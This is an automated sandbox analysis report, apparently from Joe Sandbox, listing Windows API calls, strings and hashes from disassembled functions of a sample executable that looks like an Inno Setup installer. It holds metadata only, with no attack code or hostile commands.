                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            • Opcode ID: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                            • Instruction ID: 2af12fea25256c3ae9471bae8fd4feed52cec15eb5e351c91de8273fd3ce68b3
                                                            • Opcode Fuzzy Hash: c048b5060f638d2d21f70beb9f23f52c1df829a0825c59c0675cf40435b3c9a3
                                                            • Instruction Fuzzy Hash: 055106316082058FD710DB6AD681A9BF3E5FF98304B2482BBD814C7392D7B8EDA1C759
                                                            APIs
                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00478B2A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: NtdllProc_Window
                                                            • String ID:
                                                            • API String ID: 4255912815-0
                                                            • Opcode ID: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                            • Instruction ID: 518aae51b6d6b411e39a58dd47dc5b2362a2c83c3bfed1ee6c3543fdde473bb3
                                                            • Opcode Fuzzy Hash: 9f19c8960208bf84e0a1f031f05f2c13e84af91581ae166fbadb947181b78a5a
                                                            • Instruction Fuzzy Hash: 04413775644104DFCB10CF99C6898AAB7F5FB48310B74CA9AE848DB705DB38EE41DB54
                                                            APIs
                                                            • ArcFourCrypt._ISCRYPT(?,?,?,?), ref: 0045D5AB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CryptFour
                                                            • String ID:
                                                            • API String ID: 2153018856-0
                                                            • Opcode ID: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                            • Instruction ID: 2e238a974be0c8424367b3c35ccc205e7f0a308c5ec670be841bb4718b7179ff
                                                            • Opcode Fuzzy Hash: 47a938482607ff708c7ba3b07c2d2a6c765e1a89700bf01dade5fb09ed1c08ae
                                                            • Instruction Fuzzy Hash: 37C09BF200420CBF660057D5ECC9C77B75CF6586547508126F6048210195726C104574
                                                            APIs
                                                            • ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DDBC,?,0046DF9D), ref: 0045D5BE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CryptFour
                                                            • String ID:
                                                            • API String ID: 2153018856-0
                                                            • Opcode ID: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                            • Instruction ID: 227689971defb3a768f182aa15824e3680876923b4d994b81e1676941902ce31
                                                            • Opcode Fuzzy Hash: d02f27854c06b9b5253a86ca74e309db13f969305959900ff247638bb6719fe3
                                                            • Instruction Fuzzy Hash: 9DA002B0A80300BAFD2057B05D4EF26352CA7D0F05F708465B202EA0D085A56410852C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3387478104.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000001.00000002.3387414684.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3387538957.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_10000000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                            • Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
                                                            • Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
                                                            • Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3387478104.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000001.00000002.3387414684.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3387538957.0000000010002000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_10000000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                            • Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
                                                            • Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
                                                            • Instruction Fuzzy Hash:
                                                            APIs
                                                              • Part of subcall function 0044B614: GetVersionExA.KERNEL32(00000094), ref: 0044B631
                                                            • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F785,004985C2), ref: 0044B68F
                                                            • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B6A7
                                                            • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6B9
                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6CB
                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6DD
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6EF
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B701
                                                            • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B713
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B725
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B737
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B749
                                                            • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B75B
                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B76D
                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B77F
                                                            • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B791
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B7A3
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7B5
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7C7
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7D9
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7EB
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7FD
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B80F
                                                            • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B821
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B833
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B845
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B857
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B869
                                                            • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B87B
                                                            • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B88D
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B89F
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8B1
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8C3
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8D5
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8E7
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8F9
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B90B
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B91D
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B92F
                                                            • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B941
                                                            • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B953
                                                            • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B965
                                                            • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B977
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B989
                                                            • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B99B
                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B9AD
                                                            • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9BF
                                                            • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9D1
                                                            • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoadVersion
                                                            • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                            • API String ID: 1968650500-2910565190
                                                            • Opcode ID: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                            • Instruction ID: 346aa6b979044c2d6f95573bc57da9b6801dc261a15d858c7a91061cf3dc2738
                                                            • Opcode Fuzzy Hash: 0c8e19753f2f8210615bc5a5f26c821a667ede831694cf2c59d6b62027e60e29
                                                            • Instruction Fuzzy Hash: CC91E7B0A40B50EBEF00EBF5ADC6A2637A8EB15B14714467BB444EF295D778D800CF99
                                                            APIs
                                                            • CreateMutexA.KERNEL32(00499B18,00000001,00000000,00000000,004584B9,?,?,?,00000001,?,004586D3,00000000,004586E9,?,00000000,0049B628), ref: 004581D1
                                                            • CreateFileMappingA.KERNEL32(000000FF,00499B18,00000004,00000000,00002018,00000000), ref: 00458209
                                                            • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9,?,?,?), ref: 00458230
                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045833D
                                                            • ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,00000000,0045848F,?,00499B18,00000001,00000000,00000000,004584B9), ref: 00458295
                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                            • CloseHandle.KERNEL32(004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458354
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045838D
                                                            • GetLastError.KERNEL32(00000000,000000FF,004586D3,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 0045839F
                                                            • UnmapViewOfFile.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458471
                                                            • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458480
                                                            • CloseHandle.KERNEL32(00000000,00458496,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,?), ref: 00458489
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
                                                            • String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
                                                            • API String ID: 4012871263-351310198
                                                            • Opcode ID: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                            • Instruction ID: 29107a7cf73729034b65a1fcaaf08eab05738b19563c620e852bf3134b102344
                                                            • Opcode Fuzzy Hash: cc7ad6ccf5233eaebe813f6a5333062681ccb791baa3dad4f168156cebafbadf
                                                            • Instruction Fuzzy Hash: 46914170A002099BDB10EFA9C845B9EB7B4EB05305F50856FED14FB283DF7899498F69
                                                            APIs
                                                            • 73E9A570.USER32(00000000,?,0041A954,?), ref: 0041CA50
                                                            • 73EA4C40.GDI32(?,00000000,?,0041A954,?), ref: 0041CA5C
                                                            • 73EA6180.GDI32(0041A954,?,00000001,00000001,00000000,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA80
                                                            • 73EA4C00.GDI32(?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954,?), ref: 0041CA90
                                                            • SelectObject.GDI32(0041CE4C,00000000), ref: 0041CAAB
                                                            • FillRect.USER32(0041CE4C,?,?), ref: 0041CAE6
                                                            • SetTextColor.GDI32(0041CE4C,00000000), ref: 0041CAFB
                                                            • SetBkColor.GDI32(0041CE4C,00000000), ref: 0041CB12
                                                            • PatBlt.GDI32(0041CE4C,00000000,00000000,0041A954,?,00FF0062), ref: 0041CB28
                                                            • 73EA4C40.GDI32(?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954,?,00000000,0041CC72,?,?,00000000,?,0041A954), ref: 0041CB3B
                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041CB6C
                                                            • 73E98830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?,0041A954), ref: 0041CB84
                                                            • 73E922A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B,?,0041CE4C,00000000,?), ref: 0041CB8D
                                                            • 73E98830.GDI32(0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CB9C
                                                            • 73E922A0.GDI32(0041CE4C,0041CE4C,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CC1A,?,?,00000000,0041CC2B), ref: 0041CBA5
                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041CBBE
                                                            • SetBkColor.GDI32(00000000,00000000), ref: 0041CBD5
                                                            • 73EA4D40.GDI32(0041CE4C,00000000,00000000,0041A954,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CC1A,?,?,00000000), ref: 0041CBF1
                                                            • SelectObject.GDI32(00000000,?), ref: 0041CBFE
                                                            • DeleteDC.GDI32(00000000), ref: 0041CC14
                                                              • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Color$ObjectSelect$E922E98830Text$A570A6180DeleteFillRect
                                                            • String ID:
                                                            • API String ID: 1952589944-0
                                                            • Opcode ID: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                            • Instruction ID: 69ed6b4e4825e3c47d53d1ee88e95f0281db4649dcd7e45998b3becab3701dfd
                                                            • Opcode Fuzzy Hash: adf6567a18e9830f1830aa63917bca934ba6755201e08534c76e5c919bac5cde
                                                            • Instruction Fuzzy Hash: 6261EC71A44609AFDF10EBE9DC86F9FB7B8EF48704F14446AB504E7281D67CA9408B68
                                                            APIs
                                                            • ShowWindow.USER32(?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000,004984F9,?,00000000), ref: 00497E23
                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000,?,004984EF,00000000), ref: 00497E36
                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000,00000000), ref: 00497E46
                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00497E67
                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498138,?,?,00000000,?,00000000), ref: 00497E77
                                                              • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                            • API String ID: 2000705611-3672972446
                                                            • Opcode ID: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                            • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                            • Opcode Fuzzy Hash: 082597774f549eda738f03d74d98f9d52f67cfbc56a945ed8bd031ee0c63b3f6
                                                            • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                            • API String ID: 1452528299-3112430753
                                                            • Opcode ID: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                            • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                            • Opcode Fuzzy Hash: c66920e5c30c99cf277918279cba3cc6becf5feca79c3c8df3d973bfdf2d3f66
                                                            • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                            APIs
                                                            • GetVersion.KERNEL32 ref: 0045CF3E
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                              • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                            • API String ID: 59345061-4263478283
                                                            • Opcode ID: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                            • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                            • Opcode Fuzzy Hash: 0692e2fed8a1faf7364eaae3f9f0a99faa4aa2306d0b5476e4b0968c8b8ae958
                                                            • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                            APIs
                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                            • SysFreeString.OLEAUT32(?), ref: 00456745
                                                            Strings
                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                            • CoCreateInstance, xrefs: 004565C3
                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                            • IPropertyStore::Commit, xrefs: 00456795
                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                            • IPersistFile::Save, xrefs: 00456814
